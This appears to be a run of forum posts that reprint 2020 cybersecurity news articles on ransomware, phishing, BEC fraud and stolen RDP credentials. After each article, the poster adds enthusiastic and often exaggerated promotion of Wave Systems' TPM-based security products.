The company said that services to customers, including its cloud-based services, remained unaffected and that it was not aware "of any customer information being accessed by the malware attack." This statement was recanted in a later press release two days later, when Software AG admitted to finding evidence of data theft.
The message about the attack remained on its official website homepage all week, including today.
Software AG did not return phone calls today for additional details or comments about the incident.
A copy of the ransomware binary used against Software AG was discovered earlier this week by security researcher MalwareHunterTeam. The $20+ million ransom demand is one of the largest ransom demands ever requested in a ransomware attack.
The ID provided in this ransom note allows security researchers to view the online chats between the Clop gang and Software AG on a web portal managed by the ransomware group. At the time of writing, there is no evidence the German company paid the ransom demand.
Software AG is Germany's second-largest company with more than 10,000 enterprise customers across 70 countries. Some of the company's most recognizable customers include Fujitsu, Telefonica, Vodafone, DHL, and Airbus.
Its product line includes business infrastructure software such as database systems, enterprise service bus (ESB) frameworks, software architecture (SOA), and business process management systems (BPMS).
==================================================================
Many organizations could have been tremendously helped by Wave when it comes to ransomware! data breaches! phishing! malware! unauthorized access! Organizations could find that they have underestimated the capabilities of Wave when it comes to these cyber issues!!! A small company like Wave can have surprisingly very positive results that are much better than the current results in the marketplace. Why should the market continue to suffer with the status quo?
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Boards Increase Investment in Cybersecurity in Face of Threats and Regulatory Fines
https://www.infosecurity-magazine.com/news/boards-increase-investment-fines/
Board decisions on cybersecurity spending are slowly improving following the impact of regulatory fines and COVID-19.
According to research by Thycotic surveying 908 senior IT security decision makers working within organizations with more than 500 employees, 58% plan to add more security budget in the next 12 months.
Amid growing cyber threats and rising risks through the COVID crisis, CISOs report that boards are listening and stepping up with increased budget for cybersecurity, with 91% agreeing that their board adequately supports them with investment.
In an email to Infosecurity, Joseph Carson, chief security scientist at Thycotic, said he believed the retro-fixing of security to remote working tools was “a path and direction most organizations have been going down, however it was always a lower priority.”
He claimed COVID-19 has accelerated the investment into both cloud and remote working budgets, and this includes the need for secure remote access and the ability to access from any location. “Having a CISO on the board is helping ensure technology that supports remote working environments are also secure by design,” he said.
Terence Jackson, CISO for Thycotic said while boards are definitely listening and stepping up with increased budget for cybersecurity, they tend to view any investment as a cost rather than adding business value. “However, there is still some way to go,” he continued. “The fact boards mainly approve investments after a security incident or through fear of regulatory penalties for non-compliance shows that cybersecurity investment decisions are more about insurance than about any desire to lead the field which, in the long run, limits the industry’s ability to keep pace with the cyber-criminals.”
The research also showed that 77% of respondents have received boardroom investment for new security projects either in response to a cyber incident in their organization (49%), or through fear of audit failure (28%).
Asked if the fear of regulatory fines is an effective way to win budgets, Carson said: “It really depends on how the risk of compliance fines are communicated to the board. If it is done in a way that shows the financial exposure, it highlights a real business risk that must be reduced. The CISO needs to be able to speak the same language as the board and compliance exposure is a way that the CISO can effectively show tangible financial risks.”
However, 37% of participants’ proposed investments were turned down because the threat was perceived as low risk, or because the technology had a lack of demonstrable ROI. One-third (33%) believe senior management does not comprehend the scale of threat when making cybersecurity investment decisions.
Asked if this is proof that boards are able to understand cybersecurity if they are able to determine risk levels, Carson said he believed boards are improving at understanding risks, however this can also be related to the problem that security teams struggle to relate those security investment into business risk or how it helps the business ROI.
“The main area for security improvement is always going to be how to convey business ROI from security investments and all security teams need a business financial risk analyst who can convert security risk into business risk,” he said.
=================================================================
With all the continuous billions of dollars in cyber damage being done to economies around the World, isn't it time for organizations to go with cybersecurity that works effectively and efficiently - Wave solutions!!!
==================================================================
wavesys.com
=================================================================
Wave solutions, better security!!!
HEH P2P Botnet Sports Dangerous Wiper Function
https://threatpost.com/heh-p2p-botnet-wiper-function/159974/
=================================================================
Excerpt:
Users can protect themselves by making sure Telnet ports 23/2323 aren't open to the public internet, and by ensuring strong passwords on devices.
=================================================================
One could go the strong password route or go on the simpler and more secure path of using Wave VSC 2.0!! This is where the TPM and PIN are needed by the botnet and the botnet would have a much more difficult time in getting those. There wouldn't be complicated passwords to forget or lose! This is a WIPER!!! Use better security in Wave VSC 2.0!!
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
3 Ways Companies are Working on Security by Design
https://www.darkreading.com/application-security/3-ways-companies-are-working-on-security-by-design/d/d-id/1339111
==================================================================
I'm really surprised that after 10+ years of developing the TPM and its proven capability that the TPM is not in the conversation of the above article. Or that it doesn't show up on Cybersecurity Awareness Month website. Here, cybersecurity in the World is lacking big time, and the activated TPM should be promoted at this site. Why would it not be when there is many billions of dollars in cyber damage being done to World economies???
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Corporate Credentials on the Dark Web Up by 429% This Year
https://www.infosecurity-magazine.com/news/corporate-credentials-dark-web/
There has been a 429% growth in the number of corporate credentials with plaintext passwords on the dark web so far this year, according to Arctic Wolf’s 2020 Security Operations Annual Report. This amounts to an average of 17 separate sets of credentials per a typical organization, leaving businesses particularly vulnerable to account takeover attacks (ATO).
This is despite a year-on-year decline in publicly disclosed data breaches, which Arctic Wolf attributes to “alert fatigue”, in which overworked IT and security professionals increase alert thresholds, leading to less reporting of incidents.
The study also found there was a 64% rise in phishing and ransomware attempts in Q2 of 2020 compared to Q1, with cyber-actors seeking to use the topic of COVID-19 as a lure as well as target remote workers. The banking sector experienced the biggest increase in these types of attacks, at 520%.
Additionally, since the start of the COVID-19 pandemic in March, critical vulnerability patch time has gone up by 40 days, which the authors said was driven by higher common vulnerabilities and exposures (CVE) volumes, more critical CVEs and the shift to remote workforces. Another major security concern is that there has been a 240% increase in unsecured Wi-Fi usage since March due to the emergence of home working.
The need for organizations to closely monitor their network, endpoint and cloud environments at all times was underscored by the finding that 35% of high risk incidents observed by Arctic Wolf took place between the hours of 8.00pm and 8.00am while 14% occurred on weekends, when many in-house security teams are not online.
Mark Manglicmot, vice-president, security services, Arctic Wolf, commented: “The cybersecurity industry has an effectiveness problem. Every year new technologies, vendors, and solutions emerge. Yet, despite this constant innovation, we continue to see breaches in the headlines. The only way to eliminate cybersecurity challenges like ransomware, account takeover attacks, and cloud misconfigurations is by embracing security operations capabilities that fully integrate people, processes, and technology.”
==================================================================
All it takes is one set of corporate credentials in an attacker's hands to do serious damage to a corporation. Wave could be protecting these corporations and stopping the damage from happening with Wave VSC 2.0 and Wave ERAS.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Ransomware threat surge, Ryuk attacks about 20 orgs per week
https://www.bleepingcomputer.com/news/security/ransomware-threat-surge-ryuk-attacks-about-20-orgs-per-week/
==================================================================
There was an important job(s) to be done and Everybody was sure that Somebody would do it. Anybody could have done it, but Nobody did it.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security.
TCG Executive Director Stephanie Schultz Wins a 2020 Public Relations and Marketing Excellence Award
October 2020 by Marc Jacob
https://www.globalsecuritymag.com/TCG-Executive-Director-Stephanie,20201006,103522.html
The Business Intelligence Group announced that Stephanie Schultz, Executive Director of Trusted Computing Group (TCG) has today won the Marketing Executive of the Year award at the 2020 Public Relations and Marketing Excellence Awards.
TCG is a not-for-profit organization formed to develop, define and promote open, vendor-neutral, global industry specifications and standards. Its standards have been deployed worldwide to protect against cyberattacks for today and beyond. This award recognises Stephanie’s achievements in leading TCG’s marketing strategy and corporate vision to prepare TCG for the cybersecurity challenges ahead.
==================================================================
Its interesting that with some 2,000,000,000 TPMs in the marketplace, and with the maturation and proven capability of the TPM, why aren't they all activated by now given MANY security incidents that have occurred over the last several years. Why isn't the TPM really being used when the market really needs them to be activated? Wave could help in a BIG WAY!!
Congrats, Stephanie.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!
This new "linkless" phishing scam is even tricking tech experts
https://flipboard.com/topic/cybersecurity/this-new-linkless-phishing-scam-is-even-tricking-tech-experts/a-AIOlHKwlQFqaULhchOU6tg%3Aa%3A3642466-201ed23c85%2Ftechradar.com
The cybersecurity firm Sophos has observed two new phishing campaigns in the wild that use a new trick to help them avoid detection. Email phishing...
==================================================================
When the contents of this article are combined with post 246139, there could be a dangerous combination of phishing happening: receiving HTML attachments from phishing emails that are sent as replies to genuine emails. Don't take a chance with this potentially dangerous phishing combination.
Use Wave solutions, better security!!!
==================================================================
wavesys.com
Custom-made UEFI bootkit found lurking in the wild
https://arstechnica.com/information-technology/2020/10/custom-made-uefi-bootkit-found-lurking-in-the-wild/
Attackers are going to great lengths to gain the highest level of persistence.
==================================================================
An activated TPM being used with Wave Endpoint Monitor could accomplish better things for organizations' computers!!! A lot of organizations should be using Wave solutions with activated TPMs!! It could help the situation in the above article!!
==================================================================
wavesys.com
==================================================================
Nice post Methinks!
Wave solutions, better security!!!
Ransomware victims aren't reporting attacks to police. That's causing a big problem
https://www.zdnet.com/article/ransomware-victims-arent-reporting-attacks-to-police-thats-causing-a-big-problem/
Europol's annual cyber crime report says ransomware is under-reported by victims - some of which appear to be simply hoping that nobody finds out they were a victim.
Many victims of ransomware aren't reporting attacks to police, making it harder to measure the level of crime and to tackle the gangs involved.
Europol's Internet Organised Crime Threat Assessment 2020 report details the key forms of cyber crime which pose a threat to businesses right now and ransomware remains one of the main concerns, especially as these gangs increasingly display high levels of skill and sophistication.
In many cases, ransomware gangs don't just encrypt the network with malware and demand hundreds of thousands or millions of dollars in bitcoin, they'll also threaten to leak stolen sensitive corporate files or personal data if they don't receive a payment.
And while ransomware is one of the most high profile forms of cyber attack, Europol's report warns that it remains an under-reported crime as many organisations still aren't coming forward to law enforcement after falling victim.
Several law enforcement agencies across Europe say they've only heard of ransomware cases via reports in local media.
The report suggests that approaching police to start a criminal investigation was "not generally a priority" for victims, who are more concerned with maintaining business continuity and limiting reputational damage. For some, the idea of getting law enforcement involved could be seen as a risk to their reputation.
That's why some businesses are choosing to engage with what Europol describes as "private sector security firms" to investigate attacks or negotiate ransom payments, instead of approaching the authorities.
Companies do this so evidence of the attack and their response to it can remain outside the public eye, especially given how law enforcement agencies recommend that organisations should never give into the demands of cyber criminals. But many businesses still view paying the ransom as the quickest and easiest way of restoring operations, even if cyber criminal groups can't always be trusted to keep their word.
And on top of the moral quandaries when it comes to dealing with cyber criminals or private negotiators, police warn that not reporting ransomware attacks is detrimental to others.
"By using such companies, victims will not file an official complaint, which increases the lack of visibility and awareness concerning real figures of ransomware attacks among law enforcement," says the Europol paper.
"Not reporting cases to law enforcement agencies will obviously hamper any efforts, as important evidence and intelligence from different cases can be missed".
But it isn't just businesses which were actively attempting to avoid publicity which don't report ransomware attacks; the report notes that some victims just don't think that law enforcement is able to do anything to help.
However, the report adds that investigating every attack possible helps the authorities build up a better picture of the ransomware landscape and how to potentially prevent attacks or aid organisations which fall victim.
For example, Europol's No More Ransom portal provides free decryption keys for various families of ransomware. The keys are provided by both cybersecurity companies and law enforcement agencies which have been able to break the encryption following investigation of the ransomware. If organisations don't report ransomware attacks, it could prevent other victims from being able to use free tools like this.
==================================================================
For solutions that protect against ransomware, please see post 246140. This could avoid having to call the police altogether.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security!!!
Clinical Trials Hit by Ransomware Attack on Health Tech Firm
https://www.nytimes.com/2020/10/03/technology/clinical-trials-ransomware-attack-drugmakers.html
==================================================================
No patients were affected, but the incident was another reminder of the risks in the increasingly common assaults on computer networks.
A Philadelphia company that sells software used in hundreds of clinical trials, including the crash effort to develop tests, treatments and a vaccine for the coronavirus, was hit by a ransomware attack that has slowed some of those trials over the past two weeks.
The attack on eResearchTechnology, which has not previously been reported, began two weeks ago when employees discovered that they were locked out of their data by ransomware, an attack that holds victims’ data hostage until they pay to unlock it. ERT said clinical trial patients were never at risk, but customers said the attack forced trial researchers to track their patients with pen and paper.
Among those hit were IQVIA, the contract research organization helping manage AstraZeneca’s Covid vaccine trial, and Bristol Myers Squibb, the drugmaker leading a consortium of companies to develop a quick test for the virus.
ERT has not said how many clinical trials were affected, but its software is used in drug trials across Europe, Asia and North America. It was used in three-quarters of trials that led to drug approvals by the Food and Drug Administration last year, according to its website.
On Friday, Drew Bustos, ERT’s vice president of marketing, confirmed that ransomware had seized its systems on Sept. 20. As a precaution, Mr. Bustos said, the company took its systems offline that day, called in outside cybersecurity experts and notified the Federal Bureau of Investigation.
“Nobody feels great about these experiences, but this has been contained,” Mr. Bustos said. He added that ERT was starting to bring its systems back online on Friday and planned to bring remaining systems online over the coming days.
Mr. Bustos said it was still too early to say who was behind the attack. He declined to say whether the company paid its extortionists, as so many companies hit by ransomware now do.
The attack on ERT follows another major ransomware attack last weekend on Universal Health Services, a major hospital chain with more than 400 locations, many in the United States.
NBC News first reported the attack on UHS on Monday, and said it appeared to be “one of the largest medical cyberattacks in United States history.”
The incidents followed more than a thousand ransomware attacks on American cities, counties and hospitals over the past 18 months. The attacks, once treated as a nuisance, have taken on greater urgency in recent weeks as American officials worry they may interfere, directly or indirectly, with the November election.
A ransomware attack in Germany resulted in the first known death from a cyberattack in recent weeks, after Russian hackers seized 30 servers at University Hospital Düsseldorf, crashing systems and forcing the hospital to turn away emergency patients. As a result, the German authorities said, a woman in a life-threatening condition was sent to a hospital 20 miles away in Wuppertal and died from treatment delays.
One of ERT’s clients, IQVIA, said it had been able to limit problems because it had backed up its data. Bristol Myers Squibb also said the impact of the attack had been limited, but other ERT customers had to move their clinical trials to move to pen and paper.
In a statement, IQVIA said the attack had “had limited impact on our clinical trials operations,” and added, “We are not aware of any confidential data or patient information, related to our clinical trial activities, that have been removed, compromised or stolen.”
Pfizer and Johnson & Johnson, two companies working on a coronavirus vaccine, said their coronavirus vaccine trials had not been affected.
“ERT is not a technology provider for or otherwise involved in Pfizer’s Phase 1/2/3 Covid-19 vaccine clinical trials,” Amy Rose, a spokeswoman for Pfizer, said.
Companies and research labs on the front lines of the pandemic have been repeat targets for foreign hackers over the past seven months, as countries around the world try to gauge one another’s responses and progress in addressing the virus. In May, the F.B.I. and the Department of Homeland Security warned that Chinese government spies were actively trying to steal American clinical research through cybertheft.
“Health care, pharmaceutical and research sectors working on Covid-19 response should all be aware they are the prime targets of this activity and take the necessary steps to protect their systems,” the agencies said.
More than a dozen countries have redeployed military and intelligence hackers to glean what they can about other nations’ responses, according to security researchers.
Even countries that previously did not stand out for their cyber prowess, like South Korea and Vietnam, have been named in recent security reports as countries that are engaged in hacking global health organizations in the pandemic.
=================================================================
wavesys.com
=================================================================
Wave solutions, better security, Wave solutions, better security!!
Security pros face sanctions if they help ransomware victims pay
https://www.computerweekly.com/news/252490013/Security-pros-face-sanctions-if-they-help-ransomware-victims-pay
New advisory from the US government warns cyber insurance and incident response specialists that they could be skating on thin ice if they help ransomware victims pay their attackers off.
==================================================================
Three protections that organizations exposed to ransomware wished they had:
1. Detect sneaky malware (ie. ransomware) with Wave Endpoint Monitor.
2. Keep the attackers off the network with Wave VSC 2.0 and Wave ERAS.
3. Use Wave SED management to manage SEDs and protect computers.
=================================================================
If organizations facing these problems knew about these three protections for ransomware and also what else Wave can do, there should be a long line at Wave's door.
=================================================================
wavesys.com
=================================================================
What works is better security, Wave solutions!!!
This worm phishing campaign is a game-changer in password theft, account takeovers
https://www.zdnet.com/article/this-worm-phishing-campaign-is-a-game-changer-in-password-theft-account-takeovers/
The security incident highlights the need for multi-factor authentication in the enterprise.
A phishing attack taking place against an organization has revealed a crafty method to bounce between victims in a way deemed "ingenious" by a researcher.
On September 29, cybersecurity architect and bug bounty hunter Craig Hays outlined a recent phishing attempt which went far beyond the usual spray-and-pray tactics and basic attempts to compromise a network, to become "the greatest password theft he had ever seen."
In a Medium blog post, Hays detailed how a response team received an alert from their organization at 10 am, when a user fell prey to a phishing attack.
Originally, the security expert simply deemed the notification "another day, another attack." The team locked the impacted account down and began to investigate the incident in order to find the root cause and any potential damage.
Within minutes, several more alerts pinged their inbox. This, in itself, isn't unusual. As Hayes noted, "emails that made it through the filtering rules tended to hit a number of people at the same time."
However, after the sixth report, the responders noticed this was potentially something more substantial -- and by the time they had conducted an initial damage assessment and two accounts had been recovered, they faced a "huge wave of account takeovers."
"We could see that all of the accounts were being accessed from strange locations all over the globe and sending out a large number of emails," Hays said. "For so many accounts to be hit at once, it was either a really, really effective phishing attack, or someone had been biding their time after stealing credentials over a long period."
Please see the rest of the article at the link above (recommended -to see how it works).
==================================================================
Even trained employees are going to have a difficult time with this phishing. It's very successful and sneaky. For this reason and other reasons, Wave VSC 2.0 and Wave ERAS should sell out in rapid fashion to stop this phishing.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security, Wave solutions, better security!!
Business top brass are terrified their companies will simply be collateral damage in a future cyber-war
https://www.theregister.com/2020/09/30/cyber_war_fears/
=================================================================
wavesys.com
=================================================================
Wave solutions, better security!! Wave solutions, better security!!
China-Linked 'BlackTech' Hackers Start Targeting U.S.
https://www.securityweek.com/china-linked-blacktech-hackers-start-targeting-us
The China-linked BlackTech cyber-spies have adopted new malicious tools in recent attacks, and they have started targeting the United States, Symantec security researchers revealed on Tuesday.
Also referred to as Palmerworm, the hacking group is believed to have been active since at least 2013. The campaign analyzed by Symantec ran from August 2019 until as recently as August 2020, and it targeted organizations in construction, electronics, engineering, media, and finance in Japan, Taiwan, the U.S., and China. The threat actor was previously known to target East Asia.
The recent attacks revealed the use of dual-use tools and a new suite of custom malware, including backdoors such as Consock, Waship, Dalwit, and Nomri. Previously, the threat actor was observed employing the backdoors known as Kivars and Plead (which Symantec refers to as Palmerworm).
“We have not observed the group using these malware families in previous attacks – they may be newly developed tools, or the evolution of older Palmerworm tools,” the security firm notes in a new report.
Despite the use of undocumented malware, other artefacts observed in these attacks, including the use of previously employed infrastructure, suggest that the BlackTech threat actor is behind them.
In addition to the new backdoors, the hackers leveraged a custom loader and a network reconnaissance tool, along with dual-use tools, such as Putty, PSExec, SNScan, and WinRAR.
Furthermore, the threat actor signed the payloads in these attacks with stolen code-signing certificates, a tactic it was observed employing before. While Symantec hasn’t identified the initial attack vector, the actor is known for the use of spear-phishing to access victim networks.
A total of five victims were identified in these attacks, including organizations in media, electronics, and finance based in Taiwan, an engineering company in Japan, and a construction company in China. Some U.S.-based companies were targeted as well, but they haven’t been identified.
The targeting of Taiwanese companies isn’t something new for BlackTech, which previously infiltrated government agencies in the country. Taipei said at the time that the group is operating out of China.
Although the first activity associated with the recent campaign started in August 2019, the attackers were able to maintain presence in the compromised networks for a long time: activity associated with the attack was observed on compromised machines within the media company’s network in August 2020.
“Palmerworm also maintained a presence on the networks of a construction and a finance company for several months. However, it spent only a couple of days on the network of a Japanese engineering company in September 2019, and a couple of weeks on the network of an electronics company in March 2020,” Symantec explains.
The security researchers are unsure what type of data the attackers might have exfiltrated from the compromised organizations, but believe that cyber-espionage might have been the purpose of the attacks.
==================================================================
wavesys.com
==================================================================
Wave solutions, better security, Wave solutions, better security!!
Wave solutions, better security!!!!
Universal Health Services Ransomware Attack Impacts Hospitals Nationwide
https://threatpost.com/universal-health-ransomware-hospitals-nationwide/159604/
=================================================================
I shake my head when reading an article like this one. Wave has great solutions to stop ransomware, and many ransomware incidents keep popping up. Somehow organizations are missing out on Wave's solutions, and people could be or are dying because of ransomware!!! BE PREPARED WITH WAVE SOLUTIONS!!! BETTER SECURITY AT LESS THAN HALF THE COST!!!
=================================================================
wavesys.com
The price of stolen remote login passwords is dropping. That's a bad sign
https://www.zdnet.com/article/the-price-of-stolen-remote-login-passwords-is-dropping-thats-a-bad-sign/
The cost of RDP credentials is going down - and it's probably happening because of poor cybersecurity is making log-in details easy to find.
Cyber criminals are lowering the prices they are charging for access to corporate networks
compromised remote desktop protocol (RDP) logins in a move which indicates how leaked usernames and passwords are becoming an increasingly more available to hackers as a means gaining access to corporate networks – and demonstrates how poor passwords continue to plague enterprise security.
Remote desktop protocol (RDP) enables employees to securely connect to the servers of their organisation remotely - a practice which has grown during 2020 as employees have increasingly worked from home. RDP is also regularly used by administrator accounts, enabling IT and security teams to perform updates and provide assistance to users.
However, while extremely useful, an improperly secured RDP account or server can provide cyber criminals with easy access to a corporate network with either stolen or easily cracked passwords.
Cybersecurity researchers at Armor analysed 15 different dark web markets and underground cyber criminal forums and found that the average price for RDP credentials has dropped to between $16 and $25, compared with an average of over $20 during 2019. Some dark web vendors are advertising these credentials as "non-hacked", claiming that they haven't been used before.
In many cases, the reason why stolen RDP login credentials have become available in the first place is because they're poorly secured with commonly used and weak passwords, as well as simple-to-guess user names such as 'administrator'
Often an automated brute force attack will uncover these usernames and passwords, providing the access required to the network – or giving an underground vendor with the opportunity to quickly make money by selling the credentials on.
Attackers buying the credentials could use the login details for anything from performing reconnaissance on the network, to using them as a gateway for stealing additional usernames and passwords, confidential information or intellectual property. They could also use the RDP credentials as the first stage of a major malware or ransomware attack against the organization.
And the way in which the cost of RDP credentials is going down suggests that the problem is getting worse, implying that prices are declining as the underground market gets saturated with more and more remote login details.
"Any time access used to compromise an organization gets cheaper - in this case RDP credentials - this increases the threat for businesses because there is a lower price to entry for the fraudsters," Chris Stouff, CSO of Armor told ZDNet.
It's potentially the case that more login credentials have become available because of the rise in remote working during this year.
However, it's possible for organisations to boost the security of corporate RDP services by following two simple steps. First of all, default credentials should never be used to secure accounts and instead organisations should encourage users to set up a strong password for their account.
Secondly, organisations should apply multi-factor authentication when possible as it provides a substantial barrier to cyber criminals being able to take advantage of accounts – even if the username and password have been leaked.
=================================================================
wavesys.com
Be prepared with Wave!!! Using better security at less than half the cost - Wave VSC 2.0 (MFA) would prevent the problems in the above article.
Why the $26 billion in BEC scams are worse than you think
https://www.scmagazine.com/perspectives/why-26-billion-in-bec-scams-are-worse-than-you-think/
Business email compromise (BEC) scams are one of the biggest money makers for cyber criminals. BEC attacks are also unique in that they rely on human behavior rather than sophisticated technology. Typical BEC scams use an authentic-looking email from a top executive to deceive subordinates into transferring money.
A lot of money.
The FBI reports that BEC scams cost enterprises more than $26 billion worldwide between 2016 and 2019. These scams accounted for half of all cybercrime losses in 2019. In June, reports disclosed that a U.K. affiliate of Caterpillar lost $11 million to BEC fraud. Last summer, the European subsidiary of Toyota Boshoku Corporation, a car components manufacturer member of the Toyota Group, lost more than $37 million dollars to a BEC attack. Calling it a global phenomenon, INTERPOL launched a public service campaign to warn and educate the public about BEC fraud.
How does BEC fraud differ from other attacks? Rather than launch a mass attack against hundreds or thousands of unknown targets, BEC scams focus on a single target. The attackers patiently research companies to pinpoint the right executive. They analyze the company’s website and other public information to identify senior personnel, determine the chain of command, track important customers, even study the email style of the executive they target, sometimes researching for as long as a month or more.
When ready to start their attack, fraudsters use social engineering scams to break into the network. They steal the executive’s credentials, then email a subordinate asking for immediate transfer of funds. It’s always for a credible reason — a last-minute acquisition or a late payment to a partner or supplier. Because of the urgency, the fraudster asks the employee to wire the funds to a different account than usual and keep their actions confidential. Thanks to the hacker’s due diligence, the email looks authentic and the employee wires money—right to the bank account of the scammer.
In a variant called CEO Fraud, the attacker spoofs the executive’s email without needing to actually compromise the account to request a wire transfer. BEC scams also increasingly impersonate clients, employees and vendors to divert payments or payroll funds. The Russian gang Cosmic Lynx conducted more than 200 BEC campaigns over the past year, mostly under the pretense of a law firm working with Fortune 1000 companies on mergers and acquisitions.
How can security teams protect against BEC fraud? These scams cleverly play on two glaring human vulnerabilities: an employee’s susceptibility to social engineering, and their unquestioning trust in the chain of command.
Studies show that as many as 30 percent of employees are susceptible to social engineering, especially phishing campaigns. Unfortunately, it takes only one unsuspecting employee to help set the stage for a lucrative BEC attack. Phishing scams keep increasing in sophistication – they impersonate well-known brands such as Netflix, Google, and Amazon, as well as leverage hosted servers and public cloud tools.
Companies that conduct ongoing and varied security training of their employees – starting at onboarding and continuing with regularly scheduled simulated phishing attacks, stand the greatest chance of keeping invaders out of their network. The most effective security awareness programs use a wide range of simulated campaigns, from vanilla email hyperlinks to elaborate attacks disguised as messages from real brands or customers. Interactive, relevant, and ongoing training can reduce the percentage of successful phishing attempts from 30 percent to less than 5 percent.
Help your employees to detect phishing emails with these three questions:
Is the sender really who they claim to be? Start by checking the domain name – it’s easy to miss a one-letter mismatch between the sender’s domain and the company domain. Common tricks include swapping the “i” for an “l,” adding an “s” to the end of a known domain, or adding “int” or “inc.” Emails that arrive in a business inbox from gmail-type addresses, especially if you know the name of the sender, are a big giveaway.
Does the email contain suspicious content? Red flags include improper use of grammar or language, multiple spelling mistakes, or a different layout. Hover over any email links to see if they are unusual. If so, don’t click on them!
What are they asking me to do? Always be suspicious anytime an email asks you to do something atypical or unexpected, such as provide confidential log-in credentials or PII. Take a closer look at the sender’s address or content and you’ll usually catch the attack.
Unfortunately, many phishing schemes are sucessful, and the executive’s email credentials end up in the hands of the attacker. Ultimately, BEC scams succeed because they exploit subordinates who follow the chain of command. To defend against BEC fraud, companies should implement specific business and financial policies for all payments. Communicate these policies in writing to all company employees and insist on strict adherence. Here are a few best practices. Consider this a checklist to follow:
Payment authorizations. Specify which specific employees can make payments or transfer funds. Keep the number of authorized employees to a minimum.
Payment amounts. Require multiple sign-offs above a certain amount and specify who’s required to provide the additional authorization. Policies range from any amount above the reasonable and customary for that vendor/situation to a pre-determined threshold that automatically triggers the additional sign-off. Make the confirmation by phone to a pre-specified phone number instead of email.
Third-party validation. Recent BEC fraud attacks have impersonated third-party vendors, including suppliers and lawyers. Obtain the contact name and phone number in advance for all vendors the company does business with to verify any suspicious requests for payments.
Resist urgent requests or new payment methods. Train every employee authorized to make payments for the company on how to prevent BEC fraud. Help them understand how and why they are potential targets. Remind them they need to follow the company’s official payment policies without exception. Suspect any urgent and/or secretive request to make payments to a new bank account or payment address. Take precautions even if the amount seems low, as scammers often test the waters and take a measured approach to their attack.
Most importantly, empower employees to “break the chain of command” instead of breaking the rules. BEC scammers are counting on the authority of the CEO or other top executive to convince subordinates to do what they ask. Don’t let them get away with it.
Criminals turn to BEC fraud because the profits are large and the barriers to entry are low. Protect the company by empowering its most valuable assets – the employees. Train employees how to identify phishing campaigns, and give them simple tools like a phishing incident button to report suspicious messages. Develop clear guidelines for all financial transactions and payments. Address both of these areas, and the company will keep its hard-earned dollars in the company’s bank account, not those of the cyber attacker.
Colin Bastable, CEO, Lucy Security
=================================================================
Here is a $26 Billion with a B!!! problem that could have been thwarted with Wave ERAS and Wave VSC 2.0!!! These two solutions make it possible to stop these BEC scams going forward!!!
==================================================================
wavesys.com
Wave ERAS -
Key Features: Protect against phishing, malware and other network security threats by storing authentication credentials in hardware.
Gaming Industry Hit With 10B+ Attacks In Past Two Years
https://www.darkreading.com/edge/theedge/gaming-industry-hit-with-10b+-attacks-in-past-two-years/b/d-id/1339002
Criminals scored big with credential stuffing and web app attacks, yet many gamers seem unfazed.
Akamai's latest "State of the Internet/Security" report holds worrisome news for the gaming industry: Between June 2018 and June 2020, gamers and gaming companies were the victims of 10 billion cyberattacks.
Akamai, which recorded over 100 billion credential stuffing attacks for the period, said nearly 10 billion of those targeted games. Further, attackers also went after web applications, with 152 million attacks directed at the gaming industry (out of 10.6 billion such attacks recorded overall).
According to the annual report, published today, web app attacks mostly took the form of SQL injections, as well as Local File Inclusion (LFI) attacks. The reason mobile games and web-based games are "big SQLi and LFI targets," the report says, is because successful criminals can gain access to "usernames and passwords, account information, and anything game related that is stored on the server."
Games are also ripe for distributed denial-of-service (DDoS) attacks: More than 3,000 of the 5,600 unique DDoS attacks Akamai observed between July 2019 and June 2020 were aimed at gaming, making it "by far the most-targeted sector."
Unsurprisingly, the pandemic did not help matters.
"A notable spike in credential stuffing activity occurred as isolation protocols were instituted around the world," Akamai says in the report. "Much of the traffic was the result of criminals testing credentials from old data breaches in attempts to compromise new accounts created using existing username and password combinations."
Another point of concern is that gamers aren't concerned enough: Akamai's data, compiled in coordination with DreamHack, shows that while 55% of "frequent players" admitted to having had an account compromised, only 20% of them expressed being "worried" or "very worried" about it. A little over half (54%) of hacked players said they see security as a shared responsibility between players and game companies/creators.
Akamai stressed in last year's "State of the Internet" report that gaming was fast becoming a lucrative criminal target.
"Now, with 24 months of data, we can positively state that gamers are a prime target, and so are their online existences," it says in its 2020 report.
Read the State of the Internet/Security" report here.
=================================================================
This post is in addition to post #246119. Stronger authentication with hardware security could be done with the help of Wave and Wavexpress experiences!!!
Phishing Page Targets AT&T’s Employee Multi-Factor Authentication
https://securityboulevard.com/2020/09/phishing-page-targets-atts-employee-multi-factor-authentication/
Employees at companies of all sizes can be targets of phishing attacks, but certain corporations or industries can be more valuable to an attacker than others.
For instance, employees at telecom companies will often have some level of elevated access that is unavailable to a non-employee. In fact, this access can be so valuable that attackers can find it easier and more efficient to simply bribe employees with large amounts of money, as revealed in a case last year.
It’s no surprise that we recently found a phishing page set up to replicate the AT&T Global employee login page and steal employee’s credentials and one-time passwords.
=================================================================
AT&T Global Logon Phishing Page --- Please see the picture that shows a place to enter SecurID passcode. One employee who makes the wrong choice could expose the company to a data breach or cyber attack.
There are many reasons that organizations should be using Wave VSC 2.0 over SecurID and this article is one of those reasons. Using the TPM, second factor of authentication and an international standard, over a One Time Password is better security!!!
==================================================================
https://www.wavesys.com/